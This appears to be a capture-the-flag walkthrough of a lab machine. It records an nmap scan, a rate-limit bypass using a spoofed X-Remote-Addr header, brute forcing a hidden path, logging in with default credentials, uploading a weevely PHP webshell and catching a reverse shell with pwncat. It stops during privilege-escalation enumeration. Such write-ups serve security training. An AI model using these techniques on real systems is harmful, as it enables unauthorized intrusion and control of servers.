# Nmap 7.91 scan initiated Sat Jan 23 14:28:09 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.95.187 Nmap scan report for 10.10.95.187 Host is up (0.099s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 bd:a4:a3:ae:66:68:1d:74:e1:c0:6a:eb:2b:9b:f3:33 (RSA) | 256 9a:db:73:79:0c:72:be:05:1a:86:73:dc:ac:6d:7a:ef (ECDSA) |_ 256 64:8d:5c:79:de:e1:f7:3f:08:7c:eb:b7:b3:24:64:1f (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Susta 8085/tcp open http Gunicorn 20.0.4 | http-methods: |_ Supported Methods: HEAD POST GET OPTIONS |_http-server-header: gunicorn/20.0.4 |_http-title: Spinner Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jan 23 14:29:23 2021 -- 1 IP address (1 host up) scanned in 74.06 seconds
I observed that by adding X-Remote-Addr: 127.0.0.1 the X-RateLimit-xxx headers
were removed from the answer.
Now we can try to bruteforce the number, I launched the BurpSuite Intruder
and started from 10000 to 99999 with a 1 step, I stopped after a number
return a 1136 byte answer instead of the 1166 one.
Yay, it's a CMS overview page and the name of the CMS is in the footer.
Answer:
Mara
We can consult /<path>/sitemap.php to see all existing pages.
By browsing /<path>/about.php we can find the installed version (7.2) but it's
not the answer expected, I found another path with a changelog /<path>/changes.txt,
this one contains the right version.
Answer:
7.5
Also at /<path>/lorem.php there a message:
Log in with admin and changeme to try the editor.
We can log in with the credentials at /<path>/lorem.php?login=admin.
We can upload files at /<path>/codebase/dir.php?type=filenew.
Let's create a PHP webshell and upload it:
1 2
$ weevely generate noraj agent.php Generated 'agent.php' with password 'noraj' of 761 byte size.
After upload we can see this message:
1 2 3 4 5 6 7
Processing file upload request... Please be patient, may take a while. Do not close this window whilst upload is in progress. Destination : /var/www/html/<path>/img OK: agent.php uploaded. Files saved to: /var/www/html/<path>/img All files processed successfully
So my webshell is available at: /<path>/img/agent.php.
$ pwncat -l 9999 -vv INFO: Listening on :::9999 (family 10/IPv6, TCP) INFO: Listening on 0.0.0.0:9999 (family 2/IPv4, TCP) INFO: Client connected from 10.10.224.209:60632 (family 2/IPv4, TCP) bash: cannot set terminal process group (1220): Inappropriate ioctl for device bash: no job control in this shell www-data@ubuntu-xenial:/var/www$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data)
Elevation of Privilege (EoP): from www-data to kiran#
Right now we can't read the user flag:
1 2 3 4 5 6 7 8
www-data@ubuntu-xenial:/home/kiran $ ls -lhA total 20K -rw------- 1 kiran kiran 0 Dec 9 12:29 .bash_history drwx------ 2 kiran kiran 4.0K Dec 9 04:31 .cache drwxr-x--- 3 kiran kiran 4.0K Dec 6 18:08 .config drwx------ 2 kiran kiran 4.0K Dec 6 18:09 .gnupg -rw-r--r-- 1 kiran kiran 670 Dec 9 06:51 .profile -r-------- 1 kiran kiran 33 Dec 9 11:07 user.txt
There is a hint saying to check for backups but for some reason the find
command is forbidden.
I checked the backup directory
1 2 3 4 5 6 7 8 9 10 11 12 13
www-data@ubuntu-xenial:/var/www$ ls -lhA /var/backups total 628K -r--r--r-- 1 root root 1.7K Dec 6 13:19 .bak.passwd -rw-r--r-- 1 root root 50K Dec 6 06:25 alternatives.tar.0 -rw-r--r-- 1 root root 6.2K Dec 9 06:46 apt.extended_states.0 -rw-r--r-- 1 root root 715 Dec 6 17:08 apt.extended_states.1.gz -rw-r--r-- 1 root root 509 Nov 12 19:53 dpkg.diversions.0 -rw-r--r-- 1 root root 207 Dec 6 06:01 dpkg.statoverride.0 -rw-r--r-- 1 root root 535K Dec 6 06:19 dpkg.status.0 -rw------- 1 root root 849 Dec 6 06:17 group.bak -rw------- 1 root shadow 714 Dec 6 06:17 gshadow.bak -rw------- 1 root root 1.7K Dec 6 13:19 passwd.bak -rw------- 1 root shadow 1.1K Dec 6 06:17 shadow.bak
I tried a find command to enumerated SUID binaries but it didn't worked and which
is weirdly unable to find the binary. Calling the absolute path and I get
a permission denied.
So any user except www-data & kiran can use the binary.
By looking for a SUID binary manually I found there was doas in
/usr/local/bin. So we can check the configuration in /usr/local/etc/doas.conf
instead of /etc/doas.conf.